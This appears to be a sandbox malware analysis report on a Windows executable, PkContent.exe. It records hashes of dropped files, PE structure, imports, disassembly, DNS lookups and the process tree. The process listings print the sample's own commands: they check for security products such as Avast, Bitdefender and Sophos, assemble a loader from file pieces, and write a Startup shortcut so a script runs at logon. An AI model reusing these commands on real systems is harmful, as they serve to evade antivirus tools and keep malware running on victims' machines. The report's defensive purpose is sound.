                                                     • Filename: ldqj18tn.exe, Detection: malicious
                                                     • Filename: ldqj18tn.exe, Detection: malicious
                                                     • Filename: EO3RT0fEfb.exe, Detection: malicious
                                                     • Filename: RMBOriPHVJ.exe, Detection: malicious
                                                     • Filename: S6x3K8vzCA.exe, Detection: malicious
                                                     • Filename: PPbimZI4LV.exe, Detection: malicious
                                                     • Filename: l5VhEpwzJy.exe, Detection: malicious
                                                     • Filename: duyba.lnk.download.lnk, Detection: malicious
                                                     • Filename: pt8GJiNZDT.exe, Detection: malicious
                                                     • Filename: c2.hta, Detection: malicious
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):260336
                                                    Entropy (8bit):7.999311838752394
                                                    Encrypted:true
                                                    SSDEEP:6144:SN9qVraESmDT3z3sYoAjxVs3iH96NSO8e91qkeIPC9mq5XF/:iQrskLrHoAjxVs3iH94j9QxAC9J5B
                                                    MD5:A65498AB3A69A64EAD790DB5BB2F48AA
                                                    SHA1:EB8CD723DAB355FF507B356B9286F09B9FFCD968
                                                    SHA-256:9AD27753646F1EEC5009BE7ED43BCDFC4E9AB8DFFC6FE3FF4ADC558A1F32F5CD
                                                    SHA-512:9CFCB7873C3BAD12109A85516EAF62393AA905B5A7FA93E8BC808EF0911070EA89F0E41953E67B45B74409BF0AC046FD7F4A12AB612EDF7BF01A46C459BA1CEF
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):92160
                                                    Entropy (8bit):7.997684559122398
                                                    Encrypted:true
                                                    SSDEEP:1536:IwEPVIU3le9KUpCuF/Rw7B1Ph87++NdnOpL1+2TZMzDfbCjkqmqISfnKu4+Q1P:IwE9/e91xO7fh8akkL1WPCjRmq5vv4+Q
                                                    MD5:975BFC19287C2C5B74A1B228F30F14B0
                                                    SHA1:8F5FEEC00B337529A7E193F452C45F6063AD37A1
                                                    SHA-256:91E28EFACE5E10865887B9A13420B1BFD3A8673255785E3BFC65745DA63D1322
                                                    SHA-512:18D8C41EBCBA5667CB3AC3FA1270D78CAD2FD9E8FC69DD32969B693FEDC6354E3DE12F74830E68B55C6AA7C5A0FBB388599F827CB94D71732231F4EBBF580F85
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):59392
                                                    Entropy (8bit):7.99698463424558
                                                    Encrypted:true
                                                    SSDEEP:1536:c4/at9N5gQq5rFSWa39Mp9cBESBESKI2Eux:c4K9NOQq5rpa3ipmBESmSL2Eux
                                                    MD5:01D7374BF51507454392D1081D9B309E
                                                    SHA1:034378159B5F4B6089A95064AEC9FF210DA7C3DF
                                                    SHA-256:EECDD8DFD2DD6D9D1C55077EE6515A9C59D3046112D014B7A5E87FDABB8157A2
                                                    SHA-512:DE64B35BFD2C279A77D552F7C518421BFFCF2F5D14E78FA3F80E21B97AEB5DC287340452D61CA19C9AA5CE426C61EC6605786727D844282AA5457A1D8C4F94F4
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:ASCII text, with very long lines (811), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):17659
                                                    Entropy (8bit):4.996564903453331
                                                    Encrypted:false
                                                    SSDEEP:384:qG9f41OBFJrXYnH/lQutCtyuZT2Unp1vS8++ZBBgY6V7NS:qpAvCnH9QuNuZDp1RvE7NS
                                                    MD5:F15A876FE95AF76D09E4F26593B4502E
                                                    SHA1:53D14A9F7B44DE6FD9ABA018E0F4738175A4E3A0
                                                    SHA-256:4DDF695422DB24B6917750A923DB6D55E9973A4463CF3B60F0C732D34F7728D1
                                                    SHA-512:CBC944366518FEA910CC685C6AC99CAAFA20FFD91BA8572B5E33FEEB9529CEA6684E83365C5851D6798BCD3DC265E9157AE80E60F56F061C2B78E6C935E48741
                                                    Malicious:false
                                                    Preview:Set Transform=1..cWCQInternationally Fi Vista ..ETsBowling Deborah Present Tried Voyeur Disability Affecting Divine Notebook ..gxROrders Sector Might Alter ..wYSeekers Shirts Studio Flavor ..qbmPmid Signal Somewhat Series Textbooks Placed Trustees Spank Establish ..KPDylan Home Key Bidding Quantitative Cleaning ..Set Basement=N..OzHandbags Nbc Gardens ..RkThreshold Quest Pct Orders Sn Few Mom Stores ..atjAcquisitions Finance Wishlist ..PsnCustom Brass Moisture Emails Faced ..XODhNovember Charged Effect Barry Attention Marshall Ascii ..Set Celebrities= ..cBgSquad Grill Aquarium ..xidWAtm Give Percentage Company June Dh ..PJRCompleting Advanced None Card V Ea Taxes ..OLhrEntering ..MDhAlcohol Villa Computer Pharmacology ..nAuIndustrial Clusters ..LKEeSeasons Traditions Valium Boom Dig Implemented Cherry Successful ..dHTYSummary Majority Displayed Shall Rand ..Set Programming=Y..XfTrim Microphone Ace Feedback ..omlESuccessfully Spies ..lSStarsmerchant Syndication Masturbating Approx Thou
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):886191
                                                    Entropy (8bit):6.62214375347849
                                                    Encrypted:false
                                                    SSDEEP:12288:SV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:wxz1JMyyzlohMf1tN70aw8501
                                                    MD5:260377B64080B872FFD57234FF7D097E
                                                    SHA1:F9EA953F328A1EC1CAC31AC05A6353AE27519238
                                                    SHA-256:29826DE3343C0A6F753F3CDCC551E755E12059E79B0658BE1048E5F893E1C0D3
                                                    SHA-512:A01A781D352AC7CB98FD17F91DB6114147188519819106D27A183F8BC114713DE8D0E78524DCAB8833187E365F2207DA5E4CD77FC8D787F63B48A04BF17B6DE5
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):10480
                                                    Entropy (8bit):7.983798029647035
                                                    Encrypted:false
                                                    SSDEEP:192:jynff145sxYlJ7FDcxxHHivPT+sefSn+zStbLkJdljKQQkVww:j+Hk7Fiel+zqyl+xkh
                                                    MD5:B5A2CE2534752D3A6033F59C8436D7B6
                                                    SHA1:8E184055AF6E0F7DCD83D832BD565E784A7B8E80
                                                    SHA-256:C142EBC3005012C982B366C6E4B03DB5B477C721EED245592A6F2C585EC314C3
                                                    SHA-512:C2F5480E23FCD32AC7111FC9E507B7660EE551477A1DC18F188BD5796BF29BC93CC10926908F9F6483E906BFC07DDE07BE7223BC0B4B4C5DBC0FA1C0F2D43F2C
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):7439
                                                    Entropy (8bit):6.20867102662523
                                                    Encrypted:false
                                                    SSDEEP:192:3HAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3j:3HAHhww+/2nlP3r1WAL3j
                                                    MD5:4192BA712A2FDC09914B07D144F06E20
                                                    SHA1:0A3320EEA12B490FD589B9F2CB878579108BE555
                                                    SHA-256:265661FDDDD79AEFCFBA0FC456CF864C05439B8281DA8345D200283F5664A229
                                                    SHA-512:543248B976F061C835329ADBCCBB249922EBEB671BB158D7A0E70284E0FE9D723C18E8A2E4F198202CFA20DC3D0F341EFD4E78C64F4D5E56E8D2A08745417948
                                                    Malicious:false
                                                    Preview:WowLiberalCalOfficer..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B..........................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\PkContent.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):98304
                                                    Entropy (8bit):7.997882479856261
                                                    Encrypted:true
                                                    SSDEEP:1536:jCFS3z3sTLVmA/uMsH3zK6wrNp9FCLFM1pKOnaJt7ggzNVsFBLiHy4QWQ3NSmFPN:p3z3sTLEA/Kj9S/9p1ajcQVs3iH9Q3Nn
                                                    MD5:B7C64D91870C30F6D27B86C9294CA361
                                                    SHA1:41EA994169F7BEA9752F6BD40D9833D6577EDE49
                                                    SHA-256:91A57858547382FA34E5AAD2A6C8546C4EAEAA32B515693E42E84AD190149A6A
                                                    SHA-512:D6D3625A28A8AB2AAD5E5E80CB10798D3602E0E189D521E4FECBEE4F4015F07E7D2C6F9CDBEC4C9EFCC5C903C3EBAAF9B6ABBF30D615748316992A5C398BC1B6
                                                    Malicious:false
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >), ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):96
                                                    Entropy (8bit):4.937514814070938
                                                    Encrypted:false
                                                    SSDEEP:3:HRAbABGQaFyw3pYo0nacwRE2J5iQRAcCIPcp:HRYF5yjocNwi23iQRAcPS
                                                    MD5:4E6F60332F394B1CB236BA923FC87B04
                                                    SHA1:A2D06F700B6FE01B536998CE999CBEDCF814F83C
                                                    SHA-256:5CA91FB60E41BB4919437F02D024FBD1BCE308D99354D75163C9AD292023345F
                                                    SHA-512:F2E66BA6F833D7D6C5180928EC9B5B87AC7247AA90E0614F310B6DA4F48690D6AA3147826DD9283198DAA6AE08DFC5C6BDD0B467C6B50130142F7E410F9D6C76
                                                    Malicious:true
                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" ..
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.3246704923656605
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:PkContent.exe
                                                    File size:830'415 bytes
                                                    MD5:87c051a77edc0cc77a4d791ef72367d1
                                                    SHA1:5d5bab642235f0af7d9afe3cacec5ae2a4cfc8e5
                                                    SHA256:b63bf28780e02bf0bb1bb59dec135e6263f4c582724c95eee0519b279022f31c
                                                    SHA512:259a3f823d5051fcc9e87ceacf25557ab17f5d26ff4f0c17801d9ef83a23d2a51261a73e5ba9c3caf1ca2feb18a569458f17a2a5d56b542b86d6a124a42d4c2c
                                                    SSDEEP:12288:FCxMe2dk7YgL+OsQdFGHjaRYf9bquEZ68ufU3wqB2ydPsW/w0bvf:FsMe2KYIDpSO5vZ68FwqB2aPsW3
                                                    TLSH:A80523030FEDC667D1E10EB2183381698AB2F89F05B1E66B43A08F1F3175E459A5A35F
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                    Icon Hash:0103010303030303
                                                    Entrypoint:0x403883
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                    Instruction
                                                    sub esp, 000002D4h
                                                    push ebx
                                                    push ebp
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    xor ebp, ebp
                                                    pop esi
                                                    mov dword ptr [esp+18h], ebp
                                                    mov dword ptr [esp+10h], 00409268h
                                                    mov dword ptr [esp+14h], ebp
                                                    call dword ptr [00408030h]
                                                    push 00008001h
                                                    call dword ptr [004080B4h]
                                                    push ebp
                                                    call dword ptr [004082C0h]
                                                    push 00000008h
                                                    mov dword ptr [00472EB8h], eax
                                                    call 00007FD38C8C2ACBh
                                                    push ebp
                                                    push 000002B4h
                                                    mov dword ptr [00472DD0h], eax
                                                    lea eax, dword ptr [esp+38h]
                                                    push eax
                                                    push ebp
                                                    push 00409264h
                                                    call dword ptr [00408184h]
                                                    push 0040924Ch
                                                    push 0046ADC0h
                                                    call 00007FD38C8C27ADh
                                                    call dword ptr [004080B0h]
                                                    push eax
                                                    mov edi, 004C30A0h
                                                    push edi
                                                    call 00007FD38C8C279Bh
                                                    push ebp
                                                    call dword ptr [00408134h]
                                                    cmp word ptr [004C30A0h], 0022h
                                                    mov dword ptr [00472DD8h], eax
                                                    mov eax, edi
                                                    jne 00007FD38C8C009Ah
                                                    push 00000022h
                                                    pop esi
                                                    mov eax, 004C30A2h
                                                    push esi
                                                    push eax
                                                    call 00007FD38C8C2471h
                                                    push eax
                                                    call dword ptr [00408260h]
                                                    mov esi, eax
                                                    mov dword ptr [esp+1Ch], esi
                                                    jmp 00007FD38C8C0123h
                                                    push 00000020h
                                                    pop ebx
                                                    cmp ax, bx
                                                    jne 00007FD38C8C009Ah
                                                    add esi, 02h
                                                    cmp word ptr [esi], bx
                                                    Programming Language:
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ C ] VS2010 SP1 build 40219
                                                    • [RES] VS2010 SP1 build 40219
                                                    • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x1e898 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xf4000 | 0x1e898 | 0x1ea00 | 34eb4b5442afecdb4d25529894ddb814 | False | 0.03270886479591837 | data | 0.3626277943818537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x113000 | 0xf32 | 0x1000 | 80b2788b8bb2dc8c3af02ada6000736d | False | 0.045654296875 | data | 0.3620189715935393 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf4220 | 0x11028 | Device independent bitmap graphic, 128 x 256 x 32, image size 69632 | English | United States | 0.02018027328051441
RT_ICON | 0x105248 | 0x9928 | Device independent bitmap graphic, 96 x 192 x 32, image size 39168 | English | United States | 0.02583656396653744
RT_ICON | 0x10eb70 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.05014239218877136
RT_ICON | 0x1111d8 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.07126593806921676
RT_DIALOG | 0x112300 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x112400 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x112520 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x112580 | 0x3e | data | English | United States | 0.8225806451612904
RT_MANIFEST | 0x1125c0 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 15:21:56.777230978 CET | 62373 | 53 | 192.168.2.7 | 1.1.1.1
Dec 18, 2024 15:21:56.998159885 CET | 53 | 62373 | 1.1.1.1 | 192.168.2.7
Dec 18, 2024 15:22:12.161611080 CET | 53580 | 53 | 192.168.2.7 | 1.1.1.1
Dec 18, 2024 15:22:12.299993992 CET | 53 | 53580 | 1.1.1.1 | 192.168.2.7
Dec 18, 2024 15:22:32.541296005 CET | 57507 | 53 | 192.168.2.7 | 1.1.1.1
Dec 18, 2024 15:22:32.678602934 CET | 53 | 57507 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 15:21:56.777230978 CET | 192.168.2.7 | 1.1.1.1 | 0x3b98 | Standard query (0) | ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:22:12.161611080 CET | 192.168.2.7 | 1.1.1.1 | 0xdb7e | Standard query (0) | ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:22:32.541296005 CET | 192.168.2.7 | 1.1.1.1 | 0x9937 | Standard query (0) | ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 15:21:56.998159885 CET | 1.1.1.1 | 192.168.2.7 | 0x3b98 | Name error (3) | ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:22:09.274910927 CET | 1.1.1.1 | 192.168.2.7 | 0x44ec | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:22:09.274910927 CET | 1.1.1.1 | 192.168.2.7 | 0x44ec | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:22:12.299993992 CET | 1.1.1.1 | 192.168.2.7 | 0xdb7e | Name error (3) | ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:22:32.678602934 CET | 1.1.1.1 | 192.168.2.7 | 0x9937 | Name error (3) | ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz | none | none | A (IP address) | IN (0x0001) | false

Target ID: 0
Start time: 09:21:49
Start date: 18/12/2024
Path: C:\Users\user\Desktop\PkContent.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PkContent.exe"
Imagebase: 0x400000
File size: 830'415 bytes
MD5 hash: 87C051A77EDC0CC77A4D791EF72367D1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 09:21:50
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 09:21:50
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 09:21:53
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0x510000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 09:21:53
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /I "wrsa opssvc"
Imagebase: 0x7a0000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 09:21:53
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0x510000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 09:21:53
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase: 0x330000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 09:21:54
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c md 724598
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 09:21:54
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /V "WowLiberalCalOfficer" Weight
Imagebase: 0x7a0000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 09:21:54
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 12
Start time: 09:21:55
Start date: 18/12/2024
Path: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
Wow64 process (32bit): true
Commandline: Thermal.pif y
Imagebase: 0x120000
File size: 893'608 bytes
MD5 hash: 18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 8%, ReversingLabs
Has exited: false

Target ID: 13
Start time: 09:21:55
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit): true
Commandline: choice /d y /t 5
Imagebase: 0x3f0000
File size: 28'160 bytes
MD5 hash: FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 14
Start time: 09:21:56
Start date: 18/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
Imagebase: 0x410000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
